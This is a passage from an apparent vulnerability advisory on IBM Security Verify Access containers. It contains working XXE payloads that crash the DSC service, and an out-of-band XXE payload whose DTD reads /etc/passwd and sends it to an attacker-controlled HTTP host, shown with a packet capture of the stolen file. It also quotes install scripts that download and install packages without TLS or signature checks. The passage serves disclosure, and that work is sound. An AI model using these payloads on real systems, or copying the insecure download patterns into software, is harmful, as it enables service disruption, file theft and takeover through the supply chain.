* error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure
* Closing connection 0
curl: (35) error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure

With a client certificate, we can reach the /DSess/services/DSess API:

Sending a normal request (ping):

kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc.test.lan:8443/DSess/services/DSess -X POST -H 'SOAPAction: "ping"' --data '<?xml version="1.0" encoding="utf-8" ?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Body><ns1:ping xmlns:ns1="http://sms.am.tivoli.com"><ns1:something>0</ns1:something></ns1:ping></SOAP-ENV:Body></SOAP-ENV:Envelope>'
<?xml version='1.0' encoding='utf-8' ?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<ns1:pingResponse xmlns:ns1="http://sms.am.tivoli.com">
<ns1:pingReturn>952467756</ns1:pingReturn>
</ns1:pingResponse>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

We can also send a specific XML External Entity (XXE) that will crash the remote DSC instance:

kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc-02.test.lan:8443/DSess/services/DSess -X POST -H 'SOAPAction: "ping"' --data '<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///dev/random">]><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Body><ns1:ping xmlns:ns1="http://sms.am.tivoli.com"><ns1:something>&xxe;</ns1:something></ns1:ping></SOAP-ENV:Body></SOAP-ENV:Envelope>'
curl: (52) Empty reply from server

When debugging this issue, it appears there is a null pointer dereference in the method DSessWrapper::ping(void*) () defined in /lib64/libamdsc_interface.so library:

[root@container-02]# ps -auxww | grep dscd
6000     2093037  3.4  0.5 427936 40884 ?        Ssl  20:07   0:00 /opt/dsc/bin/dscd -c /var/dsc/etc/dsc.conf.1 -f -j
root     2093269  0.0  0.0  12140  1092 pts/0    S+   20:07   0:00 grep --color=auto dscd
[root@container-02]# gdb -p 2093037
[...]
(gdb) c
Continuing. 
[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x7fec38006110 --> 0x7fecaf4df160 --> 0x7fecaf280e20 --> 0x4100261081058b48 
RCX: 0x7fec38000b60 --> 0x1000100030005 
RDX: 0x7fec38025900 --> 0x7fec38021c90 --> 0x7fec38026230 --> 0x7fec38025dc0 --> 0x0 
RSI: 0x4 
RDI: 0x0 
RBP: 0x7fec2804f7c0 --> 0x7fecb0297548 --> 0x7fecb0079560 --> 0x480021e921058b48 
RSP: 0x7feca642fc10 --> 0x1d2e480 --> 0x7fecaf4dfbf8 --> 0x7fecaf292870 --> 0x410024f509058b48 
RIP: 0x7fecb007a595 --> 0x48ffffca04e8188b 
R8 : 0x7fec38000b74 --> 0x3000600060005 
R9 : 0x4 
R10: 0x2f ('/')
R11: 0x7fecaabb2674 --> 0x29058b48fb894853 
R12: 0xffffffff 
R13: 0x7feca642fca0 --> 0x7fec380312f0 ("/DSess/services/DSess")
R14: 0x7feca642fce0 --> 0x7feca642fcf0 --> 0x7f00676e6970 
R15: 0x0
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7fecb007a58a <_ZN12DSessWrapper4pingEPv+154>:      call   QWORD PTR [rax+0x38]
   0x7fecb007a58d <_ZN12DSessWrapper4pingEPv+157>:      mov    esi,0x4
   0x7fecb007a592 <_ZN12DSessWrapper4pingEPv+162>:      mov    rdi,rax
=> 0x7fecb007a595 <_ZN12DSessWrapper4pingEPv+165>:      mov    ebx,DWORD PTR [rax]
   0x7fecb007a597 <_ZN12DSessWrapper4pingEPv+167>:      call   0x7fecb0076fa0 <_ZdlPvm@plt>
   0x7fecb007a59c <_ZN12DSessWrapper4pingEPv+172>:      mov    rdi,QWORD PTR [rsp+0x18]
   0x7fecb007a5a1 <_ZN12DSessWrapper4pingEPv+177>:      mov    rax,QWORD PTR [rdi]
   0x7fecb007a5a4 <_ZN12DSessWrapper4pingEPv+180>:      call   QWORD PTR [rax+0x2f0]
[------------------------------------stack-------------------------------------]
0000| 0x7feca642fc10 --> 0x1d2e480 --> 0x7fecaf4dfbf8 --> 0x7fecaf292870 --> 0x410024f509058b48 
0008| 0x7feca642fc18 --> 0x7fecaf292d8e --> 0xda89481d74c08548 
0016| 0x7feca642fc20 --> 0x7fec28040830 --> 0x7fecaf4e00a0 --> 0x7fecaf29b5a0 --> 0x4100246a21058b48 
0024| 0x7feca642fc28 --> 0x1e3f6e0 --> 0x7fecaf4e1120 --> 0x7fecaf2b2450 --> 0x530022f9a9058b48 
0032| 0x7feca642fc30 --> 0x7feca642fc80 --> 0x7feca642fc90 --> 0x7fec30071c00 --> 0x50 ('P')
0040| 0x7feca642fc38 --> 0x7fec3800e720 --> 0x7fecaf4dece8 --> 0x7fecaf27a770 --> 0x4800267369058b48 
0048| 0x7feca642fc40 --> 0x7fec38006110 --> 0x7fecaf4df160 --> 0x7fecaf280e20 --> 0x4100261081058b48 
0056| 0x7feca642fc48 --> 0x7fecaf27a8a1 --> 0xf2e668debc48941 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fecb007a595 in DSessWrapper::ping(void*) () from target:/lib64/libamdsc_interface.so
gdb-peda$ bt
#0  0x00007fecb007a595 in DSessWrapper::ping(void*) () from target:/lib64/libamdsc_interface.so
#1  0x00007fecaf27a8a1 in tivsec_axiscpp::ServerAxisEngine::invoke(tivsec_axiscpp::MessageData*) () from target:/lib64/libtivsec_axis_server.so
#2  0x00007fecaf27b0d2 in tivsec_axiscpp::ServerAxisEngine::process(tivsec_axiscpp::SOAPTransport*) () from target:/lib64/libtivsec_axis_server.so
#3  0x00007fecaf297156 in process_request(tivsec_axiscpp::SOAPTransport*) () from target:/lib64/libtivsec_axis_server.so
#4  0x00007fecb02a3293 in AMWSMSServiceClient::processRequest(AMWSMSService::WorkerRequest&, bool) () from target:/lib64/libamdsc_server.so
#5  0x00007fecb02a3ff8 in AMWSMSService::workerThreadRun() () from target:/lib64/libamdsc_server.so
#6  0x00007fecb02a4089 in start_worker_thread () from target:/lib64/libamdsc_server.so
#7  0x00007fecaec801ca in start_thread () from target:/lib64/libpthread.so.0
#8  0x00007fecae6d3d83 in clone () from target:/lib64/libc.so.6

I can also confirm the null pointer dereference in the dmesg output of the container-02 test server:

[899328.145854] dscd[2106406]: segfault at 0 ip 00007f18e53ff595 sp 00007f18db93ac10 error 4 in libamdsc_interface.so[7f18e53ec000+30000]
[899485.595069] dscd[2107491]: segfault at 0 ip 00007f25a6041595 sp 00007f259c9cdc10 error 4 in libamdsc_interface.so[7f25a602e000+30000]
[899575.542524] dscd[2109718]: segfault at 0 ip 00007f331fde5595 sp 00007f3316938c10 error 4 in libamdsc_interface.so[7f331fdd2000+30000]
[899614.404309] dscd[2111181]: segfault at 0 ip 00007fec9cad4595 sp 00007fec9d29dc10 error 4 in libamdsc_interface.so[7fec9cac1000+30000]
[899761.869511] dscd[2112040]: segfault at 0 ip 00007f86cf8a0595 sp 00007f86c5edfc10 error 4 in libamdsc_interface.so[7f86cf88d000+30000]

I can confirm the verify-access-dsc instance crashes on container-02 as shown below.

Before the PoC, the verify-access-dsc instance is running:

[root@container-02]# podman ps
CONTAINER ID  IMAGE                                                COMMAND       CREATED       STATUS                       PORTS                             NAMES
e462789b901b  ibmcom/verify-access-runtime/10.0.4.0:20220926.6                     28 hours ago  Up 28 hours ago (healthy)    0.0.0.0:9443->9443/tcp            verify-access-runtime
0ff1b85073d6  ibmcom/verify-access-dsc/10.0.4.0:20220926.6                         28 hours ago  Up 28 minutes ago (healthy)  0.0.0.0:8443-8444->8443-8444/tcp  verify-access-dsc

After the PoC, the verify-access-dsc instance does not run anymore:

[root@container-02]# podman ps
CONTAINER ID  IMAGE                                                COMMAND       CREATED       STATUS                     PORTS                     NAMES
e462789b901b  ibmcom/verify-access-runtime/10.0.4.0:20220926.6                     28 hours ago  Up 28 hours ago (healthy)  0.0.0.0:9443->9443/tcp    verify-access-runtime
[root@container-02]#

An attacker with the dsc-client SSL certificate can crash the DSC servers and crash the entire authentication system.

Details - XML External Entity (XXE) in dscd

It was observed that the DSC (Distributed Session Cache) servers are vulnerable to XML External Entity (XXE) attacks. DSC servers are used to store session information.

The DSC servers are reachable using the /DSess/services/DSess API running on port 8443/tcp.

With a client certificate, we can reach the /DSess/services/DSess API.

Content of the payload.txt file containing the XXE payload that will be sent to the remote DSC server:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://10.0.0.45/dtd.xml">
%xxe;
]>
<foo></foo>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
        <SOAP-ENV:Body>
                <ns1:ping xmlns:ns1="http://sms.am.tivoli.com">
                        <ns1:something>X</ns1:something>
                </ns1:ping>
        </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Content of the dtd.xml file hosted on http://10.0.0.45/. This DTD file is referenced by the payload.txt file:

kali% cat /var/www/html/dtd.xml 
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.0.0.45/?x=%file;'>">
%eval;
%exfiltrate;

Sending the previous payload will result in an exception on the remote DSC server:

kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc-02.test.lan:8443/DSess/services/DSess -H 'SOAPAction: "ping"' --data '@payload.txt' -v
*   Trying 10.0.0.16:8443... 
* Connected to dsc-02.test.lan (10.0.0.16) port 8443 (#0)
[...]
> POST /DSess/services/DSess HTTP/1.1
> Host: dsc-02.test.lan:8443
> User-Agent: curl/7.82.0
> Accept: */*
> SOAPAction: "ping"
> Content-Length: 453
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: Apache Axis C++/1.6.a
< Connection: close
< Content-Length: 330
< Content-Type: text/xml
< 
<?xml version='1.0' encoding='utf-8' ?>
<SOAP-ENV:Envelope>
<SOAP-ENV:Body>
<SOAP-ENV:Fault>
<faultcode>SOAP-ENV:Server</faultcode>
<faultstring>Unknown exception</faultstring>
<faultactor>server name:listen port</faultactor>
<detail>Unknown Exception has occured</detail>
</SOAP-ENV:Fault>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

* Closing connection 0
* TLSv1.2 (OUT), TLS alert, close notify (256):

At the same time, when sniffing the HTTP connections to the remote HTTP server providing http://10.0.0.45/?x=%file, we can observe HTTP requests from the DSC server (acting as a HTTP client).

There is a successful exfiltration of the /etc/passwd file of the DSC instance - this file was specified in the dtd.xml file at http://10.0.0.45/dtd.xml, used by the malicious payload:

kali# tcpdump -n -i eth0 -s0 -X port 80
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
10:01:12.655204 IP 10.0.0.16.60254 > 10.0.0.45.80: Flags [P.], seq 1:753, ack 1, win 229, options [nop,nop,TS val 2959987485 ecr 3936552717], length 752: HTTP: GET /root:x:0:0:root:/root:/bin/bash
[...]
    0x0030:  eaa3 070d 4745 5420 2f72 6f6f 743a 783a  ....GET./root:x:
    0x0040:  303a 303a 726f 6f74 3a2f 726f 6f74 3a2f  0:0:root:/root:/
    0x0050:  6269 6e2f 6261 7368 0a62 696e 3a78 3a31  bin/bash.bin:x:1
    0x0060:  3a31 3a62 696e 3a2f 6269 6e3a 2f73 6269  :1:bin:/bin:/sbi
    0x0070:  6e2f 6e6f 6c6f 6769 6e0a 6461 656d 6f6e  n/nologin.daemon
    0x0080:  3a78 3a32 3a32 3a64 6165 6d6f 6e3a 2f73  :x:2:2:daemon:/s
    0x0090:  6269 6e3a 2f73 6269 6e2f 6e6f 6c6f 6769  bin:/sbin/nologi
    0x00a0:  6e0a 6164 6d3a 783a 333a 343a 6164 6d3a  n.adm:x:3:4:adm:
    0x00b0:  2f76 6172 2f61 646d 3a2f 7362 696e 2f6e  /var/adm:/sbin/n
    0x00c0:  6f6c 6f67 696e 0a6c 703a 783a 343a 373a  ologin.lp:x:4:7:
    0x00d0:  6c70 3a2f 7661 722f 7370 6f6f 6c2f 6c70  lp:/var/spool/lp
    0x00e0:  643a 2f73 6269 6e2f 6e6f 6c6f 6769 6e0a  d:/sbin/nologin. 
    0x00f0:  7379 6e63 3a78 3a35 3a30 3a73 796e 633a  sync:x:5:0:sync:
    0x0100:  2f73 6269 6e3a 2f62 696e 2f73 796e 630a  /sbin:/bin/sync. 
    0x0110:  7368 7574 646f 776e 3a78 3a36 3a30 3a73  shutdown:x:6:0:s
    0x0120:  6875 7464 6f77 6e3a 2f73 6269 6e3a 2f73  hutdown:/sbin:/s
    0x0130:  6269 6e2f 7368 7574 646f 776e 0a68 616c  bin/shutdown.hal
    0x0140:  743a 783a 373a 303a 6861 6c74 3a2f 7362  t:x:7:0:halt:/sb
    0x0150:  696e 3a2f 7362 696e 2f68 616c 740a 6d61  in:/sbin/halt.ma
    0x0160:  696c 3a78 3a38 3a31 323a 6d61 696c 3a2f  il:x:8:12:mail:/
    0x0170:  7661 722f 7370 6f6f 6c2f 6d61 696c 3a2f  var/spool/mail:/
    0x0180:  7362 696e 2f6e 6f6c 6f67 696e 0a6f 7065  sbin/nologin.ope
    0x0190:  7261 746f 723a 783a 3131 3a30 3a6f 7065  rator:x:11:0:ope
    0x01a0:  7261 746f 723a 2f72 6f6f 743a 2f73 6269  rator:/root:/sbi
    0x01b0:  6e2f 6e6f 6c6f 6769 6e0a 6761 6d65 733a  n/nologin.games:
    0x01c0:  783a 3132 3a31 3030 3a67 616d 6573 3a2f  x:12:100:games:/
    0x01d0:  7573 722f 6761 6d65 733a 2f73 6269 6e2f  usr/games:/sbin/
    0x01e0:  6e6f 6c6f 6769 6e0a 6674 703a 783a 3134  nologin.ftp:x:14
    0x01f0:  3a35 303a 4654 5020 5573 6572 3a2f 7661  :50:FTP.User:/va
    0x0200:  722f 6674 703a 2f73 6269 6e2f 6e6f 6c6f  r/ftp:/sbin/nolo
    0x0210:  6769 6e0a 6e6f 626f 6479 3a78 3a36 3535  gin.nobody:x:655
    0x0220:  3334 3a36 3535 3334 3a4b 6572 6e65 6c20  34:65534:Kernel. 
    0x0230:  4f76 6572 666c 6f77 2055 7365 723a 2f3a  Overflow.User:/:
    0x0240:  2f73 6269 6e2f 6e6f 6c6f 6769 6e0a 6973  /sbin/nologin.is
    0x0250:  616d 3a78 3a36 3030 303a 3630 3030 3a3a  am:x:6000:6000::
    0x0260:  2f68 6f6d 652f 6973 616d 3a2f 6269 6e2f  /home/isam:/bin/
    0x0270:  6261 7368 0a69 766d 6772 3a78 3a36 3030  bash.ivmgr:x:600
    0x0280:  313a 3630 3031 3a41 6363 6573 7320 4d61  1:6001:Access.Ma
    0x0290:  6e61 6765 7220 5573 6572 3a2f 6f70 742f  nager.User:/opt/
    0x02a0:  506f 6c69 6379 4469 7265 6374 6f72 3a2f  PolicyDirector:/
    0x02b0:  6269 6e2f 6661 6c73 650a 7469 766f 6c69  bin/false.tivoli
    0x02c0:  3a78 3a36 3030 323a 3630 3032 3a4f 776e  :x:6002:6002:Own
    0x02d0:  6572 206f 6620 5469 766f 6c69 2043 6f6d  er.of.Tivoli.Com
[...]

An attacker can read any file located in the instance - the DSC server will send any file specified in the payload to an attacker-controlled HTTP server.

An attacker with the dsc-client SSL certificate can exfiltrate any sensitive information from the instance.

Details - Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh)

It was observed that the Docker images verify-access-dsc ,verify-access-runtime and verify-access-wrp use insecure communications to download several rpm and zip files that will then be installed or decompressed as root.

The /usr/sbin/install_isva.sh script contains insecure downloading of rpm files and zip files. These rpm files will then be installed as root.

An attacker located on the network can inject malicious rpm or zip files into the authentication platform and take control over the entire authentication platform.

There are 3 different /usr/sbin/install_isva.sh scripts found in these images but they share the same vulnerable code:

kali-docker# sha256sum **/install_isva.sh   
1c851f579baeda9d3c11e7721aaa5960dc6a3d6b052bcc8a46979d0634e31892  _verify-access-dsc.tar/787d9cec79e27fccd75a56b7101b39da38161f9d3749d6d0fd7cfcc8252aca34/usr/sbin/install_isva.sh
00f2ca8ad004af9c9e16b6cfdf480dcdb52dc36c7ff64df2bcc34495f6a9ae8d  _verify-access-runtime.tar/694cb5f84eff9a4b0aac37a4bd9f65116051953f3aee5e4e998af5938e684a5e/usr/sbin/install_isva.sh
8a59d7f89c6d587d9b764b9e4748cf0d20d406f65433a813464b32a13745f6da  _verify-access-wrp.tar/937031a6ab4bc7bd504dcbee8d242f181e904c1722489077cf468daae176e2da/usr/sbin/install_isva.sh

Vulnerable code in verify-access-dsc - download over HTTP or without checking the SSL certificate (lines 24, 60 and 82) and installation of packages as root without checking the signatures (line 76):

Content of /usr/sbin/install_isva.sh in verify-access-dsc:

[code:shell] 22 files=/root/files.txt 23 24 curl -k ${WEBSERVER}/ -o $files [...] 38 # 39 # Install each of our RPMs. 40 # 41 42 pkgs="gskcrypt64 \ 43 gskssl64 \ 44 Base-ISVA \ 45 idsldap-license64 \ 46 idsldap-cltbase64 \ 47 idsldap-clt64bit64 \ 48 Pdlic-PD \ 49 TivSecUtl-TivSec \ 50 PDRTE-PD \ 51 PDWebRTE-PD \ 52 PDWebDSC-PD" 53 54 for pkg in $pkgs; do 55 echo "Installing $pkg" 56 57 # Download and install the file. 58 rpm_file=locate_rpm_file $pkg 59 60 curl -fail -s -k ${WEBSERVER}/$rpm_file -o /root/$rpm_file [...] 76 rpm -i $extra_args /root/$rpm_file [...] 78 # Download the include file and delete all files not included in the file. 79 include=rpm -qp /root/$rpm_file --qf "%{NAME}.include" 80 include_file=/root/$include 81 82 set +e; curl --fail -s -k ${WEBSERVER}/$include -o $include_file; rc=$?; set -e 83 84 if [ $rc -eq 0 -a -f $include_file ] ; then 85 # Convert the include file to be regular expression based instead of 86 # glob based. 87 sed -i "s|*|.*|g" $include_file 88 89 for entry in rpm -ql /root/$rpm_file | grep -xvf $include_file; do 90 if [ -f $entry ] ; then 91 rm -f $entry 92 fi 93 done 94 fi [/code]

The code in verify-access-wrp is also very similar and shares the same vulnerabilities.

Vulnerable code in verify-access-runtime - same vulnerability in /usr/sbin/install_isva.sh with an additional vulnerability with the insecure download, due to the -k option on line 117 (alias to --insecure) and extraction of zip files as root in line 119:

[code:shell] 28 files=/root/files.txt 29 30 curl -k ${WEBSERVER}/ -o $files [...] 41 pkgs="gskcrypt64 \ 42 gskssl64 \ 43 Base-ISVA \ 44 PDlic-PD \ 45 TivSecUtl-TivSec \ 46 PDRTE-PD \ 47 PDWebWAPI-PD \ 48 PDWebDSC-PD \ 49 VerifyAccessRuntimeFeatures \ 50 MesaConfig \ 51 FIM \ 52 RBA" 53 54 for pkg in $pkgs; do 55 echo "Installing $pkg" 56 57 # Download and install the file. 58 rpm_file=locate_rpm_file $pkg 59 60 curl --fail -s -k ${WEBSERVER}/$rpm_file -o /root/$rpm_file [...] 78 rpm -i $extra_args /root/$rpm_file 79 80 # Download the include file and delete all files not included in the file. 81 include=rpm -qp /root/$rpm_file --qf "%{NAME}.include" 82 include_file=/root/$include 83 84 set +e; curl --fail -s -k ${WEBSERVER}/$include -o $include_file; rc=$?; set -e 85 86 if [ $rc -eq 0 -a -f $include_file ] ; then 87 # Convert the include file to be regular expression based instead of 88 # glob based. 89 sed -i "s|*|.*|g" $include_file 90 91 for entry in rpm -ql /root/$rpm_file | grep -xvf $include_file; do 92 if [ -f $entry ] ; then 93 rm -f $entry 94 fi 95 done 96 fi [...] 108 zips="\ 109 com.ibm.tscc.rtss.wlp.zip:/opt/rtss \ 110 com.ibm.isam.common.eclipse.wlp.zip:/opt/IBM \ 111 pdjrte-0.0.0-0.zip:/opt" 112 113 for entry in $zips; do 114 zip=echo $entry | cut -f 1 -d ':' 115 dst=echo $entry | cut -f 2 -d ':' 116 117 curl --fail -s -k ${WEBSERVER}/$zip -o /root/$zip 118 mkdir -p $dst 119 unzip -q /root/$zip -d $dst 120 121 rm -f /root/$zip 122 done [/code]

Details - Remote Code Execution due to insecure download of rpm in verify-access-runtime (/usr/sbin/install_java_liberty.sh)

It was observed that the Docker image verify-access-runtime insecurely downloads zip files.

An attacker located on the network can inject malicious zip files into the platform and take control over the entire platform.

The /usr/sbin/install_java_liberty.sh script contains insecure downloading of zip files. These zip files will then be extracted as root into the /opt/java, /opt/ibm, /opt/oracle/jdbc and /opt/IBM/db2 directories, providing WebSphere Liberty binaries (that will then be used to provide executable code).

It is also possible to remotely delete any file as root (lines 61 to 65).

Vulnerable code in /usr/sbin/install_java_liberty.sh:

[code:shell] 14 web_files=/root/files.txt 15 16 locate_file() 17 { 18 grep "$1" $web_files | cut -f 2 -d '"' 19 } 20 curl -k ${WEBSERVER}/ -o $web_files 21 [...] 29 # 30 # Install each of our zip files. 31 # 32 33 zips="\ 34 ibm-semeru-open-jre_x64_linux_11..tar.gz:/opt/java \ 35 liberty..zip:/opt/ibm \ 36 oracle_jdbc_..zip:/opt/oracle/jdbc \ 37 ibm-db2-jdbc..tar.gz:/opt/IBM/db2" 38 39 for entry in $zips; do 40 zip=echo $entry | cut -f 1 -d ':' 41 dst=echo $entry | cut -f 2 -d ':' 42 43 # Download and install the file. 44 zip_file=locate_file $zip 45 46 curl --fail -s -k ${WEBSERVER}/$zip_file -o /root/$zip_file 47 48 mkdir -p $dst 49 50 set +e; echo $zip | grep -q .zip; rc=$?; set -e 51 if [ $rc -eq 0 ] ; then 52 unzip -q /root/$zip_file -d $dst 53 exclude=echo $zip_file | sed "s|.zip|.exclude|g" 54 else 55 tar -x -C $dst -f /root/$zip_file 56 exclude=echo $zip_file | sed "s|.tar.gz|.exclude|g" 57 fi 58 59 exclude_file=/root/$exclude 60 61 set +e; curl --fail -s -k ${WEBSERVER}/$exclude -o $exclude_file; rc=$?; set -e 62 63 if [ $rc -eq 0 -a -s $exclude_file ] ; then 64 cd $dst 65 cat $exclude_file | xargs rm -rf 66 fi [/code]

Details - Remote Code Execution due to insecure Repository configuration

It was observed that the Docker images verify-access-dsc, verify-access-runtime and verify-access-wrp use insecure CentOS repositories:

    • The transport is done over HTTP (in clear-text) - instead of HTTPS.
    • The check of the signature is disabled.
    • These repositories will be enabled by default.

An attacker located on the network (local network or any Internet router located between the instance and the remote mirror.centos.org server) can inject malicious RPMs and take control over the entire platform.

The /usr/sbin/install_system.sh script in these 3 images will enable 4 remote repositories over HTTP and will disable the check of signature of the downloaded packages from these repositories:

 31 centos_repo_file="/etc/yum.repos.d/centos.repo"
 32 
 33 cat <<EOT >> $centos_repo_file
 34 [CentOS-8_base]
 35 name = CentOS-8 - Base
 36 baseurl = http://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os
 37 gpgcheck = 0
 38 enabled = 1 
 39 
 40 [CentOS-8_appstream]
 41 name = CentOS-8 - AppStream
 42 baseurl = http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os
 43 gpgcheck = 0        
 44 enabled = 1
 45 EOT
[...]
 98 #
 99 # Enable install of the busybox RPM from the Fedora repository. 
100 #
101 
102 fedora_repo_file="/etc/yum.repos.d/fedora.repo"
103 
104 cat <<EOT >> $fedora_repo_file
105 [fedora]                                                                                                                                                                                        
106 name=Fedora                                                                                                                                                                                     
107 metalink=https://mirrors.fedoraproject.org/metalink?repo=fedora-33&arch=x86_64
108 enabled=1
109 gpgcheck=0
110 
111 [fedora-updates]
112 name=Fedora Updates
113 metalink=https://mirrors.fedoraproject.org/metalink?repo=updates-released-f33&arch=x86_64
114 enabled=1
115 gpgcheck=0
116 EOT

It was confirmed that this configuration appears in the verify-access-runtime instance in the live system:

[root@container-01]# for i in $(podman ps | grep -v NAMES | awk '{ print $1 }'); do podman ps | grep $i; podman exec -it $i cat /etc/yum.repos.d/centos.repo;echo;done
4262005f3646  ibmcom/verify-access/10.0.4.0:20221006.1                         7 hours ago  Up 7 hours ago (healthy)  0.0.0.0:7443->9443/tcp            verify-access
cat: /etc/yum.repos.d/centos.repo: No such file or directory

c930c46acd66  ibmcom/verify-access-runtime/10.0.4.0:20221006.1                        7 hours ago  Up 7 hours ago (healthy)  0.0.0.0:9443->9443/tcp            verify-access-runtime
name = CentOS-8 - Base
baseurl = http://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os
gpgcheck = 0
enabled = 1

[CentOS-8_appstream]
name = CentOS-8 - AppStream
baseurl = http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os
gpgcheck = 0
enabled = 1

48f1b1e8f782  ibmcom/verify-access-dsc/10.0.4.0:20221006.1                            7 hours ago  Up 7 hours ago (healthy)  0.0.0.0:8443-8444->8443-8444/tcp  verify-access-dsc
cat: /etc/yum.repos.d/centos.repo: No such file or directory

[root@container-01]#

Furthermore, the script /usr/sbin/install_system.sh will insecurely download programs and install them as root, using the previous insecure repositories:

[code:shell] 48 # Install tools required for container build process. 49 # 50 51 microdnf -y install unzip shadow-utils jansson openssl libxslt \ 52 libnsl2 gzip cpio tar [...] 55 # We have an issue where RedHat periodically introduces a dependency on 56 # openssl-pkcs11. We don't actually need this package and so we manually remove 57 # it if it has been installed. 58 # 59 60 if [ rpm -q -a | grep openssl-pkcs11 | wc -l -ne 0 ] ; then 61 rpm --erase openssl-pkcs11 62 fi [...] 70 rpms="" 71 for lang in en cs de es fi fr hu it ja ko nl pl pt ru zh; do 72 rpms="$rpms glibc-langpack-$lang" 73 done [...] 122 microdnf -y install busybox [/code]

Details - Additional repository configuration (potential supply-chain attack)

It was observed that the Docker images verify-access-runtime and verify-access-wrp use a third-party repository configuration, obtained when retrieving the external file at https://repo.symas.com/configs/SOFL/rhel8/sofl.repo:

Content of /usr/sbin/install_system.sh:

[code:shell] 47 # 48 # Install OpenLDAP. This is no longer provided by CentOS. 49 # 50 51 sofl_repo_file="/etc/yum.repos.d/sofl.repo" 52 53 curl https://repo.symas.com/configs/SOFL/rhel8/sofl.repo \ 54 -o $sofl_repo_file [/code]

It was confirmed that this configuration appears in the verify-access-runtime instance in the live system:

[isam@verify-access-runtime /]$ cat /etc/yum.repos.d/sofl.repo 
[sofl]
name=Symas OpenLDAP for Linux RPM repository
baseurl=https://repo.symas.com/repo/rpm/SOFL/rhel8
gpgkey=https://repo.symas.com/repo/gpg/RPM-GPG-KEY-symas-com-signing-key
gpgcheck=1
enabled=1
[isam@verify-access-runtime /]$

When reading the /usr/sbin/install_system.sh script, this repository is used to install an additional package, without checking the signature:

[code:shell] 58 # 59 # We want to manually install the openldap server RPM as microdnf pulls 60 # in a whole heap of dependencies which we don't require. 61 # 62 63 baseurl=grep baseurl $sofl_repo_file | cut -f 2 -d '='/x86_64 64 version=rpm -q --qf "%{VERSION}-%{RELEASE}" symas-openldap 65 rpmfile=/tmp/openldap.rpm 66 67 curl $baseurl/symas-openldap-servers-$version.x86_64.rpm -o $rpmfile 68 69 rpm -i --nodeps $rpmfile 70 71 rm -f $rpmfile [/code]

There is a potential supply-chain attack and this dependency is not documented.

Details - Remote Code Execution due to insecure /usr/sbin/install_system.sh script in verify-access-runtime

It was observed that the Docker image verify-access-runtime uses a highly insecure /usr/sbin/install_system.sh script.

With the 2 previous vulnerabilities already explained in Additional repository configuration (potential supply-chain attack) and Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh), this version adds 2 new vulnerabilities:

    • Installation of 3 packages downloaded over HTTP without checking the signature (lines 82, 84 and 90); and
    • Replacement of /usr/share/java/postgresql-jdbc/postgresql.jar using a postgresql.jar file directly retrieved over HTTP (line 99) and with -k (aka --insecure).

Content of /usr/sbin/install_system.sh:

[code:shell] 73 # 74 # For the postgresql packages we need to download and install manually so 75 # that we don't also pull in all of the unnecessary dependencies. 76 # 77 78 centos_base=http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os/Packages/ 79 80 rpms=/tmp/rpms.txt 81 82 curl http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os/Packages/ -o $rpms 83 84 for pkg in postgresql-12 postgresql-server-12 postgresql-jdbc-42; do 85 rpm_file=grep $pkg $rpms | tail -n 1 | \ 86 sed 's|.*href="||g' | cut -f 1 -d '"' 87 88 echo "Installing: $rpm_file" 89 90 rpm -i --nodeps $centos_base/$rpm_file 91 done 92 93 rm -f $rpms 94 95 # 96 # Need a more current jar then what is part of the postges-jdbc rpm 97 # 98 postgres_jar=locate_file postgresql-.*.jar 99 curl -kv ${WEBSERVER}/$postgres_jar -o /usr/share/java/postgresql-jdbc/postgresql.jar [/code]

An attacker located on the network (local network or any Internet router located between the instance and the remote mirror.centos.org server) can inject malicious rpm or a malicious .jar file and take control over the entire platform.

Note that IBM does not consider this vulnerability since the script is supposed to be executed in a secure network.

Details - Remote Code Execution due to insecure reload script in verify-access-runtime

It was observed that the Docker image verify-access-runtime uses a highly insecure reload script.

